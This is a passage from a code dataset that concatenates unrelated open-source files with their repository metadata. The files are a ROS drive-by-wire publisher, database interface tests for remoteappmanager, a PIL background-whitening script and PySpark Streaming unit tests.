    def dbw_enabled_cb(self, msg):
        # NOTE(review): msg is a std_msgs/Bool *message object*, which is
        # always truthy; this likely should store msg.data instead — confirm.
        self.dbw_enabled = msg

    def twist_cb(self, msg):
        # Proposed linear (forward) and angular (yaw) velocity.
        self.linear_vel = msg.twist.linear.x
        self.angular_vel = msg.twist.angular.z

    def velocity_cb(self, msg):
        # Current measured forward velocity.
        self.current_vel = msg.twist.linear.x

    def publish(self, throttle, brake, steer):
        """Publish the three actuator commands on their respective topics."""
        tcmd = ThrottleCmd()
        tcmd.enable = True
        tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
        tcmd.pedal_cmd = throttle
        self.throttle_pub.publish(tcmd)

        scmd = SteeringCmd()
        scmd.enable = True
        scmd.steering_wheel_angle_cmd = steer
        self.steer_pub.publish(scmd)

        bcmd = BrakeCmd()
        bcmd.enable = True
        bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
        bcmd.pedal_cmd = brake
        self.brake_pub.publish(bcmd)
if __name__ == '__main__':
    # Constructing the node blocks inside DBWNode.loop() until ROS shutdown.
    DBWNode()
| true | true |
f7fa45ec75b3960d95119de764163e3b74e4d488 | 5,767 | py | Python | remoteappmanager/db/tests/abc_test_interfaces.py | robertopreste/simphony-remote | 4b07ecd0cf7a66b534e215225bc4a97e903feabb | [
"BSD-3-Clause"
] | null | null | null | remoteappmanager/db/tests/abc_test_interfaces.py | robertopreste/simphony-remote | 4b07ecd0cf7a66b534e215225bc4a97e903feabb | [
"BSD-3-Clause"
] | 1 | 2021-07-30T11:01:56.000Z | 2021-07-30T11:01:56.000Z | remoteappmanager/db/tests/abc_test_interfaces.py | robertopreste/simphony-remote | 4b07ecd0cf7a66b534e215225bc4a97e903feabb | [
"BSD-3-Clause"
] | null | null | null | from abc import abstractmethod, ABCMeta
import inspect as _inspect
import string
from remoteappmanager.db.interfaces import ABCApplication, ABCApplicationPolicy
from remoteappmanager.db import exceptions
class ABCTestDatabaseInterface(metaclass=ABCMeta):
    """Reusable test contract for database implementations.

    Subclasses supply a concrete database plus the expected users and
    configs, and inherit the verification test methods.
    """

    def assertApplicationEqual(self, app1, app2, msg=None):
        """Assert two applications agree on every ABCApplication
        constructor argument (except 'id')."""
        args = _inspect.getargs(ABCApplication.__init__.__code__).args[1:]
        for arg in args:
            if arg == 'id':
                # Skip the id because our comparison objects may not have them.
                continue
            if getattr(app1, arg) != getattr(app2, arg):
                raise self.failureException(msg)

    def assertApplicationPolicyEqual(self, policy1, policy2, msg=None):
        """Assert two policies agree on every ABCApplicationPolicy
        constructor argument."""
        args = _inspect.getargs(
            ABCApplicationPolicy.__init__.__code__).args[1:]
        for arg in args:
            if getattr(policy1, arg) != getattr(policy2, arg):
                raise self.failureException(msg)

    @abstractmethod
    def create_expected_users(self):
        """ Return a list of expected users """

    @abstractmethod
    def create_expected_configs(self, user):
        """ Return a list of (Application, ApplicationPolicy) pair for
        the given user.
        """

    @abstractmethod
    def create_database(self):
        """ Create an object that complies with ABCAccounting """

    @abstractmethod
    def test_get_user(self):
        """ Test ABCDatabase.get_user """

    def test_get_accounting_for_user(self):
        """ Test get_accounting_for_user returns an iterable of ApplicationConfig
        """
        database = self.create_database()

        # An unknown (None) user owns no accounting entries.
        self.assertEqual(database.get_accounting_for_user(None), [])

        for user in self.create_expected_users():
            expected_configs = self.create_expected_configs(user)
            actual_id_configs = database.get_accounting_for_user(user)
            # should be ( (Application, ApplicationPolicy),
            #             (Application, ApplicationPolicy) ... )
            actual_configs = tuple((accounting.application,
                                    accounting.application_policy)
                                   for accounting in actual_id_configs)

            # Compare the content of list of (Application, ApplicationPolicy)
            # Note that their order does not matter
            self.assertEqual(len(actual_configs), len(expected_configs),
                             "Expected: {}, Actual: {}".format(
                                 expected_configs, actual_configs))

            temp = list(actual_configs)
            for expected in expected_configs:
                for index, actual in enumerate(temp[:]):
                    try:
                        self.assertEqual(actual[0], expected[0])
                        self.assertEqual(actual[1], expected[1])
                    except AssertionError:
                        continue
                    else:
                        # Matched: pop it so duplicates must match one-to-one.
                        temp.pop(index)
                        break
                else:
                    self.fail('Expected {0} is not found in {1}'.format(
                        expected, actual_configs))

            if temp:
                self.fail('These are not expected: {}'.format(temp))

    def test_get_accounting_for_user_mapping_id_rest_compliant(self):
        """ Test that every mapping id is REST-identifier compliant
        (ASCII letters and digits only). """
        allowed_chars = set(string.ascii_letters+string.digits)
        database = self.create_database()

        for user in self.create_expected_users():
            # should be ((mapping_id, Application, ApplicationPolicy),
            #            (mapping_id, Application, ApplicationPolicy) ... )
            actual_id_configs = database.get_accounting_for_user(user)

            if not actual_id_configs:
                continue

            for entry in actual_id_configs:
                self.assertFalse(
                    set(entry.id) - allowed_chars,
                    "mapping id should contain these characters only: {} "
                    "Got : {}".format(allowed_chars, entry.id))

    def test_list_users(self):
        """The database must report exactly the expected user names."""
        database = self.create_database()
        expected_names = sorted([user.name
                                 for user in self.create_expected_users()])
        obtained_names = sorted([user.name
                                 for user in database.list_users()])
        self.assertEqual(expected_names, obtained_names)

    def test_list_applications(self):
        """The database must report exactly the expected application images."""
        database = self.create_database()
        expected_images = set()
        for user in self.create_expected_users():
            expected_images.update(
                set([app.image
                     for app, _ in self.create_expected_configs(user)])
            )

        obtained_images = set(
            [app.image for app in database.list_applications()]
        )
        self.assertEqual(expected_images, obtained_images)

    def test_unsupported_ops(self):
        """create/remove/grant/revoke must raise UnsupportedOperation
        for this database."""
        db = self.create_database()
        for method in [db.create_user,
                       db.create_application,
                       ]:
            with self.assertRaises(exceptions.UnsupportedOperation):
                method("bonkers")

        for method in [db.remove_user,
                       db.remove_application
                       ]:
            with self.assertRaises(exceptions.UnsupportedOperation):
                method(id=12345)

        for method in [db.grant_access, db.revoke_access]:
            with self.assertRaises(exceptions.UnsupportedOperation):
                method("bonkers", "uuu", 'key', True, False, "/a:/b:ro")

        with self.assertRaises(exceptions.UnsupportedOperation):
            db.revoke_access_by_id(12345)
| 37.940789 | 81 | 0.587134 | from abc import abstractmethod, ABCMeta
import inspect as _inspect
import string
from remoteappmanager.db.interfaces import ABCApplication, ABCApplicationPolicy
from remoteappmanager.db import exceptions
class ABCTestDatabaseInterface(metaclass=ABCMeta):
    """Reusable test contract for database implementations.

    Note: the abstract methods below have docstring-only bodies — without
    the docstrings the definitions would be syntactically incomplete.
    """

    def assertApplicationEqual(self, app1, app2, msg=None):
        """Compare two applications field-by-field (skipping 'id')."""
        args = _inspect.getargs(ABCApplication.__init__.__code__).args[1:]
        for arg in args:
            if arg == 'id':
                # ids may be absent on comparison objects
                continue
            if getattr(app1, arg) != getattr(app2, arg):
                raise self.failureException(msg)

    def assertApplicationPolicyEqual(self, policy1, policy2, msg=None):
        """Compare two application policies field-by-field."""
        args = _inspect.getargs(
            ABCApplicationPolicy.__init__.__code__).args[1:]
        for arg in args:
            if getattr(policy1, arg) != getattr(policy2, arg):
                raise self.failureException(msg)

    @abstractmethod
    def create_expected_users(self):
        """Return a list of expected users."""

    @abstractmethod
    def create_expected_configs(self, user):
        """Return (Application, ApplicationPolicy) pairs for the given user."""

    @abstractmethod
    def create_database(self):
        """Create an object that complies with ABCAccounting."""

    @abstractmethod
    def test_get_user(self):
        """Test ABCDatabase.get_user."""

    def test_get_accounting_for_user(self):
        """get_accounting_for_user must return the expected accounting pairs."""
        database = self.create_database()
        self.assertEqual(database.get_accounting_for_user(None), [])
        for user in self.create_expected_users():
            expected_configs = self.create_expected_configs(user)
            actual_id_configs = database.get_accounting_for_user(user)
            actual_configs = tuple((accounting.application,
                                    accounting.application_policy)
                                   for accounting in actual_id_configs)
            # order-independent multiset comparison of the config pairs
            self.assertEqual(len(actual_configs), len(expected_configs),
                             "Expected: {}, Actual: {}".format(
                                 expected_configs, actual_configs))
            temp = list(actual_configs)
            for expected in expected_configs:
                for index, actual in enumerate(temp[:]):
                    try:
                        self.assertEqual(actual[0], expected[0])
                        self.assertEqual(actual[1], expected[1])
                    except AssertionError:
                        continue
                    else:
                        # Matched: pop so duplicates must match one-to-one.
                        temp.pop(index)
                        break
                else:
                    self.fail('Expected {0} is not found in {1}'.format(
                        expected, actual_configs))
            if temp:
                self.fail('These are not expected: {}'.format(temp))

    def test_get_accounting_for_user_mapping_id_rest_compliant(self):
        """Every mapping id must be alphanumeric (REST-identifier compliant)."""
        allowed_chars = set(string.ascii_letters+string.digits)
        database = self.create_database()
        for user in self.create_expected_users():
            actual_id_configs = database.get_accounting_for_user(user)
            if not actual_id_configs:
                continue
            for entry in actual_id_configs:
                self.assertFalse(
                    set(entry.id) - allowed_chars,
                    "mapping id should contain these characters only: {} "
                    "Got : {}".format(allowed_chars, entry.id))

    def test_list_users(self):
        """list_users must report exactly the expected user names."""
        database = self.create_database()
        expected_names = sorted([user.name
                                 for user in self.create_expected_users()])
        obtained_names = sorted([user.name
                                 for user in database.list_users()])
        self.assertEqual(expected_names, obtained_names)

    def test_list_applications(self):
        """list_applications must report exactly the expected images."""
        database = self.create_database()
        expected_images = set()
        for user in self.create_expected_users():
            expected_images.update(
                set([app.image
                     for app, _ in self.create_expected_configs(user)])
            )
        obtained_images = set(
            [app.image for app in database.list_applications()]
        )
        self.assertEqual(expected_images, obtained_images)

    def test_unsupported_ops(self):
        """Mutating calls must raise exceptions.UnsupportedOperation."""
        db = self.create_database()
        for method in [db.create_user,
                       db.create_application,
                       ]:
            with self.assertRaises(exceptions.UnsupportedOperation):
                method("bonkers")
        for method in [db.remove_user,
                       db.remove_application
                       ]:
            with self.assertRaises(exceptions.UnsupportedOperation):
                method(id=12345)
        for method in [db.grant_access, db.revoke_access]:
            with self.assertRaises(exceptions.UnsupportedOperation):
                method("bonkers", "uuu", 'key', True, False, "/a:/b:ro")
        with self.assertRaises(exceptions.UnsupportedOperation):
            db.revoke_access_by_id(12345)
| true | true |
f7fa47561052691d4b48455dcaa0aa388dc50277 | 358 | py | Python | hard-gists/5808d73731b50f8abbdcb3c3c5c1e6fa/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/5808d73731b50f8abbdcb3c3c5c1e6fa/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/5808d73731b50f8abbdcb3c3c5c1e6fa/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | from PIL import Image
if __name__ == "__main__":
    # Whiten every pixel whose RGB lies within the hard-coded band — in
    # effect this removes a blue-ish background from this specific photo.
    im = Image.open("mr.zhang.jpg")
    x, y = im.size
    for i in range(x):
        for j in range(y):
            r, g, b = im.getpixel((i,j))
            # Thresholds were picked empirically for this image; note that
            # b < 265 can never exclude anything since channel values max
            # out at 255.
            if (20< r < 180) and (80< g < 250) and (180< b< 265):
                r, g, b = 255, 255, 255
                im.putpixel((i, j), (r, g, b))
    im.show()
| 29.833333 | 65 | 0.458101 | from PIL import Image
if __name__ == "__main__":
    # Whiten every pixel whose RGB lies within the hard-coded band,
    # removing the photo's blue-ish background.
    im = Image.open("mr.zhang.jpg")
    x, y = im.size
    for i in range(x):
        for j in range(y):
            r, g, b = im.getpixel((i,j))
            # Empirical thresholds; b < 265 is always true for 8-bit data.
            if (20< r < 180) and (80< g < 250) and (180< b< 265):
                r, g, b = 255, 255, 255
                im.putpixel((i, j), (r, g, b))
    im.show()
| true | true |
f7fa481d50235b6b7c21246d7eaf8f9e9c4fadf4 | 50,689 | py | Python | python/pyspark/streaming/tests.py | yongjiaw/spark | b25723af88412520aecab1aebaf12cb63c4d696c | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null | python/pyspark/streaming/tests.py | yongjiaw/spark | b25723af88412520aecab1aebaf12cb63c4d696c | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null | python/pyspark/streaming/tests.py | yongjiaw/spark | b25723af88412520aecab1aebaf12cb63c4d696c | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | 2 | 2020-07-23T13:31:01.000Z | 2021-05-06T15:46:24.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import os
import sys
from itertools import chain
import time
import operator
import tempfile
import random
import struct
import shutil
from functools import reduce
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.context import SparkConf, SparkContext, RDD
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.context import StreamingContext
from pyspark.streaming.kafka import Broker, KafkaUtils, OffsetRange, TopicAndPartition
from pyspark.streaming.flume import FlumeUtils
from pyspark.streaming.mqtt import MQTTUtils
from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
class PySparkStreamingTestCase(unittest.TestCase):
    """Base class for PySpark Streaming tests.

    One SparkContext is shared across the whole test class; each individual
    test gets a fresh StreamingContext with a short batch duration.
    """

    timeout = 10  # seconds to wait for expected output before giving up
    duration = .5  # batch duration of the StreamingContext, in seconds

    @classmethod
    def setUpClass(cls):
        class_name = cls.__name__
        conf = SparkConf().set("spark.default.parallelism", 1)
        cls.sc = SparkContext(appName=class_name, conf=conf)
        cls.sc.setCheckpointDir("/tmp")

    @classmethod
    def tearDownClass(cls):
        cls.sc.stop()
        # Clean up in the JVM just in case there has been some issues in Python API
        try:
            jSparkContextOption = SparkContext._jvm.SparkContext.get()
            if jSparkContextOption.nonEmpty():
                jSparkContextOption.get().stop()
        except:
            pass

    def setUp(self):
        self.ssc = StreamingContext(self.sc, self.duration)

    def tearDown(self):
        if self.ssc is not None:
            self.ssc.stop(False)
        # Clean up in the JVM just in case there has been some issues in Python API
        try:
            jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
            if jStreamingContextOption.nonEmpty():
                jStreamingContextOption.get().stop(False)
        except:
            pass

    def wait_for(self, result, n):
        """Poll until `result` holds at least `n` items or `timeout` elapses."""
        start_time = time.time()
        while len(result) < n and time.time() - start_time < self.timeout:
            time.sleep(0.01)
        if len(result) < n:
            print("timeout after", self.timeout)

    def _take(self, dstream, n):
        """
        Return the first `n` elements in the stream (will start and stop).
        """
        results = []

        def take(_, rdd):
            if rdd and len(results) < n:
                results.extend(rdd.take(n - len(results)))

        dstream.foreachRDD(take)

        self.ssc.start()
        self.wait_for(results, n)
        return results

    def _collect(self, dstream, n, block=True):
        """
        Collect each RDDs into the returned list.

        :return: list, which will have the collected items.
        """
        result = []

        def get_output(_, rdd):
            # only keep non-empty batch outputs, up to n of them
            if rdd and len(result) < n:
                r = rdd.collect()
                if r:
                    result.append(r)

        dstream.foreachRDD(get_output)

        if not block:
            return result

        self.ssc.start()
        self.wait_for(result, n)
        return result

    def _test_func(self, input, func, expected, sort=False, input2=None):
        """
        @param input: dataset for the test. This should be list of lists.
        @param func: wrapped function. This function should return PythonDStream object.
        @param expected: expected output for this testcase.
        """
        if not isinstance(input[0], RDD):
            input = [self.sc.parallelize(d, 1) for d in input]
        input_stream = self.ssc.queueStream(input)
        if input2 and not isinstance(input2[0], RDD):
            input2 = [self.sc.parallelize(d, 1) for d in input2]
        input_stream2 = self.ssc.queueStream(input2) if input2 is not None else None

        # Apply test function to stream.
        if input2:
            stream = func(input_stream, input_stream2)
        else:
            stream = func(input_stream)

        result = self._collect(stream, len(expected))
        if sort:
            # order-insensitive comparison for keyed outputs
            self._sort_result_based_on_key(result)
            self._sort_result_based_on_key(expected)
        self.assertEqual(expected, result)

    def _sort_result_based_on_key(self, outputs):
        """Sort the list based on first value."""
        for output in outputs:
            output.sort(key=lambda x: x[0])
class BasicOperationTests(PySparkStreamingTestCase):
def test_map(self):
"""Basic operation test for DStream.map."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.map(str)
expected = [list(map(str, x)) for x in input]
self._test_func(input, func, expected)
def test_flatMap(self):
"""Basic operation test for DStream.faltMap."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.flatMap(lambda x: (x, x * 2))
expected = [list(chain.from_iterable((map(lambda y: [y, y * 2], x))))
for x in input]
self._test_func(input, func, expected)
def test_filter(self):
"""Basic operation test for DStream.filter."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.filter(lambda x: x % 2 == 0)
expected = [[y for y in x if y % 2 == 0] for x in input]
self._test_func(input, func, expected)
def test_count(self):
"""Basic operation test for DStream.count."""
input = [range(5), range(10), range(20)]
def func(dstream):
return dstream.count()
expected = [[len(x)] for x in input]
self._test_func(input, func, expected)
def test_reduce(self):
"""Basic operation test for DStream.reduce."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.reduce(operator.add)
expected = [[reduce(operator.add, x)] for x in input]
self._test_func(input, func, expected)
def test_reduceByKey(self):
"""Basic operation test for DStream.reduceByKey."""
input = [[("a", 1), ("a", 1), ("b", 1), ("b", 1)],
[("", 1), ("", 1), ("", 1), ("", 1)],
[(1, 1), (1, 1), (2, 1), (2, 1), (3, 1)]]
def func(dstream):
return dstream.reduceByKey(operator.add)
expected = [[("a", 2), ("b", 2)], [("", 4)], [(1, 2), (2, 2), (3, 1)]]
self._test_func(input, func, expected, sort=True)
def test_mapValues(self):
"""Basic operation test for DStream.mapValues."""
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 2), (3, 3)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.mapValues(lambda x: x + 10)
expected = [[("a", 12), ("b", 12), ("c", 11), ("d", 11)],
[(0, 14), (1, 11), (2, 12), (3, 13)],
[(1, 11), (2, 11), (3, 11), (4, 11)]]
self._test_func(input, func, expected, sort=True)
def test_flatMapValues(self):
"""Basic operation test for DStream.flatMapValues."""
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 1), (3, 1)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.flatMapValues(lambda x: (x, x + 10))
expected = [[("a", 2), ("a", 12), ("b", 2), ("b", 12),
("c", 1), ("c", 11), ("d", 1), ("d", 11)],
[(0, 4), (0, 14), (1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11)],
[(1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11), (4, 1), (4, 11)]]
self._test_func(input, func, expected)
def test_glom(self):
"""Basic operation test for DStream.glom."""
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.glom()
expected = [[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]
self._test_func(rdds, func, expected)
def test_mapPartitions(self):
"""Basic operation test for DStream.mapPartitions."""
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
def f(iterator):
yield sum(iterator)
return dstream.mapPartitions(f)
expected = [[3, 7], [11, 15], [19, 23]]
self._test_func(rdds, func, expected)
def test_countByValue(self):
"""Basic operation test for DStream.countByValue."""
input = [list(range(1, 5)) * 2, list(range(5, 7)) + list(range(5, 9)), ["a", "a", "b", ""]]
def func(dstream):
return dstream.countByValue()
expected = [[4], [4], [3]]
self._test_func(input, func, expected)
def test_groupByKey(self):
"""Basic operation test for DStream.groupByKey."""
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
return dstream.groupByKey().mapValues(list)
expected = [[(1, [1]), (2, [1]), (3, [1]), (4, [1])],
[(1, [1, 1, 1]), (2, [1, 1]), (3, [1])],
[("a", [1, 1]), ("b", [1]), ("", [1, 1, 1])]]
self._test_func(input, func, expected, sort=True)
def test_combineByKey(self):
"""Basic operation test for DStream.combineByKey."""
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
def add(a, b):
return a + str(b)
return dstream.combineByKey(str, add, add)
expected = [[(1, "1"), (2, "1"), (3, "1"), (4, "1")],
[(1, "111"), (2, "11"), (3, "1")],
[("a", "11"), ("b", "1"), ("", "111")]]
self._test_func(input, func, expected, sort=True)
def test_repartition(self):
input = [range(1, 5), range(5, 9)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.repartition(1).glom()
expected = [[[1, 2, 3, 4]], [[5, 6, 7, 8]]]
self._test_func(rdds, func, expected)
def test_union(self):
input1 = [range(3), range(5), range(6)]
input2 = [range(3, 6), range(5, 6)]
def func(d1, d2):
return d1.union(d2)
expected = [list(range(6)), list(range(6)), list(range(6))]
self._test_func(input1, func, expected, input2=input2)
def test_cogroup(self):
input = [[(1, 1), (2, 1), (3, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1)]]
input2 = [[(1, 2)],
[(4, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 2)]]
def func(d1, d2):
return d1.cogroup(d2).mapValues(lambda vs: tuple(map(list, vs)))
expected = [[(1, ([1], [2])), (2, ([1], [])), (3, ([1], []))],
[(1, ([1, 1, 1], [])), (2, ([1], [])), (4, ([], [1]))],
[("a", ([1, 1], [1, 1])), ("b", ([1], [1])), ("", ([1, 1], [1, 2]))]]
self._test_func(input, func, expected, sort=True, input2=input2)
def test_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.join(b)
expected = [[('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_left_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.leftOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3))]]
self._test_func(input, func, expected, True, input2)
def test_right_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.rightOuterJoin(b)
expected = [[('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_full_outer_join(self):
input = [[('a', 1), ('b', 2)]]
input2 = [[('b', 3), ('c', 4)]]
def func(a, b):
return a.fullOuterJoin(b)
expected = [[('a', (1, None)), ('b', (2, 3)), ('c', (None, 4))]]
self._test_func(input, func, expected, True, input2)
def test_update_state_by_key(self):
def updater(vs, s):
if not s:
s = []
s.extend(vs)
return s
input = [[('k', i)] for i in range(5)]
def func(dstream):
return dstream.updateStateByKey(updater)
expected = [[0], [0, 1], [0, 1, 2], [0, 1, 2, 3], [0, 1, 2, 3, 4]]
expected = [[('k', v)] for v in expected]
self._test_func(input, func, expected)
class WindowFunctionTests(PySparkStreamingTestCase):
    """Tests for window-based DStream operations.

    The batch interval comes from PySparkStreamingTestCase (duration = .5),
    so a window length of 1.5 spans three batches and a slide of .5 advances
    the window one batch at a time.
    """
    timeout = 15  # window tests emit extra trailing batches, so allow more time
    def test_window(self):
        """window() followed by count(): one count per sliding window."""
        input = [range(1), range(2), range(3), range(4), range(5)]
        def func(dstream):
            return dstream.window(1.5, .5).count()
        # Counts ramp up while the window fills, then drain after input ends.
        expected = [[1], [3], [6], [9], [12], [9], [5]]
        self._test_func(input, func, expected)
    def test_count_by_window(self):
        """countByWindow() should match window().count() for the same window."""
        input = [range(1), range(2), range(3), range(4), range(5)]
        def func(dstream):
            return dstream.countByWindow(1.5, .5)
        expected = [[1], [3], [6], [9], [12], [9], [5]]
        self._test_func(input, func, expected)
    def test_count_by_window_large(self):
        """countByWindow() over a larger window (2.5 = five batches)."""
        input = [range(1), range(2), range(3), range(4), range(5), range(6)]
        def func(dstream):
            return dstream.countByWindow(2.5, .5)
        expected = [[1], [3], [6], [10], [15], [20], [18], [15], [11], [6]]
        self._test_func(input, func, expected)
    def test_count_by_value_and_window(self):
        """countByValueAndWindow(): expected values match the number of distinct elements per window."""
        input = [range(1), range(2), range(3), range(4), range(5), range(6)]
        def func(dstream):
            return dstream.countByValueAndWindow(2.5, .5)
        expected = [[1], [2], [3], [4], [5], [6], [6], [6], [6], [6]]
        self._test_func(input, func, expected)
    def test_group_by_key_and_window(self):
        """groupByKeyAndWindow() groups each key's values over the sliding window."""
        input = [[('a', i)] for i in range(5)]
        def func(dstream):
            return dstream.groupByKeyAndWindow(1.5, .5).mapValues(list)
        expected = [[('a', [0])], [('a', [0, 1])], [('a', [0, 1, 2])], [('a', [1, 2, 3])],
                    [('a', [2, 3, 4])], [('a', [3, 4])], [('a', [4])]]
        self._test_func(input, func, expected)
    def test_reduce_by_invalid_window(self):
        """Invalid window/slide durations make reduceByKeyAndWindow raise ValueError."""
        input1 = [range(3), range(5), range(1), range(6)]
        d1 = self.ssc.queueStream(input1)
        self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 0.1, 0.1))
        self.assertRaises(ValueError, lambda: d1.reduceByKeyAndWindow(None, None, 1, 0.1))
class StreamingContextTests(PySparkStreamingTestCase):
    """Tests for StreamingContext lifecycle, input sources, and static accessors."""
    duration = 0.1
    setupCalled = False  # flipped by setupFunc closures to observe (non-)invocation
    def _add_input_stream(self):
        """Attach a queue stream so the context has something to process."""
        inputs = [range(1, x) for x in range(101)]
        stream = self.ssc.queueStream(inputs)
        self._collect(stream, 1, block=False)
    def test_stop_only_streaming_context(self):
        """stop(False) must leave the underlying SparkContext usable."""
        self._add_input_stream()
        self.ssc.start()
        self.ssc.stop(False)
        self.assertEqual(len(self.sc.parallelize(range(5), 5).glom().collect()), 5)
    def test_stop_multiple_times(self):
        """Calling stop() twice must not raise."""
        self._add_input_stream()
        self.ssc.start()
        self.ssc.stop(False)
        self.ssc.stop(False)
    def test_queue_stream(self):
        """queueStream emits its input lists one batch at a time."""
        input = [list(range(i + 1)) for i in range(3)]
        dstream = self.ssc.queueStream(input)
        result = self._collect(dstream, 3)
        self.assertEqual(input, result)
    def test_text_file_stream(self):
        """textFileStream picks up files written to the monitored directory."""
        d = tempfile.mkdtemp()
        self.ssc = StreamingContext(self.sc, self.duration)
        dstream2 = self.ssc.textFileStream(d).map(int)
        result = self._collect(dstream2, 2, block=False)
        self.ssc.start()
        for name in ('a', 'b'):
            # Sleep so each file lands in a distinct batch window.
            time.sleep(1)
            with open(os.path.join(d, name), "w") as f:
                f.writelines(["%d\n" % i for i in range(10)])
        self.wait_for(result, 2)
        self.assertEqual([list(range(10)), list(range(10))], result)
    def test_binary_records_stream(self):
        """binaryRecordsStream splits files into fixed-length (10-byte) records."""
        d = tempfile.mkdtemp()
        self.ssc = StreamingContext(self.sc, self.duration)
        dstream = self.ssc.binaryRecordsStream(d, 10).map(
            lambda v: struct.unpack("10b", bytes(v)))
        result = self._collect(dstream, 2, block=False)
        self.ssc.start()
        for name in ('a', 'b'):
            time.sleep(1)
            with open(os.path.join(d, name), "wb") as f:
                f.write(bytearray(range(10)))
        self.wait_for(result, 2)
        self.assertEqual([list(range(10)), list(range(10))], [list(v[0]) for v in result])
    def test_union(self):
        """ssc.union of two identical streams doubles each batch's elements."""
        input = [list(range(i + 1)) for i in range(3)]
        dstream = self.ssc.queueStream(input)
        dstream2 = self.ssc.queueStream(input)
        dstream3 = self.ssc.union(dstream, dstream2)
        result = self._collect(dstream3, 3)
        expected = [i * 2 for i in input]
        self.assertEqual(expected, result)
    def test_transform(self):
        """ssc.transform combines multiple streams' RDDs in a single function."""
        dstream1 = self.ssc.queueStream([[1]])
        dstream2 = self.ssc.queueStream([[2]])
        dstream3 = self.ssc.queueStream([[3]])
        def func(rdds):
            rdd1, rdd2, rdd3 = rdds
            return rdd2.union(rdd3).union(rdd1)
        dstream = self.ssc.transform([dstream1, dstream2, dstream3], func)
        self.assertEqual([2, 3, 1], self._take(dstream, 3))
    def test_get_active(self):
        """getActive() tracks the started context and resets on stop."""
        self.assertEqual(StreamingContext.getActive(), None)
        # Verify that getActive() returns the active context
        self.ssc.queueStream([[1]]).foreachRDD(lambda rdd: rdd.count())
        self.ssc.start()
        self.assertEqual(StreamingContext.getActive(), self.ssc)
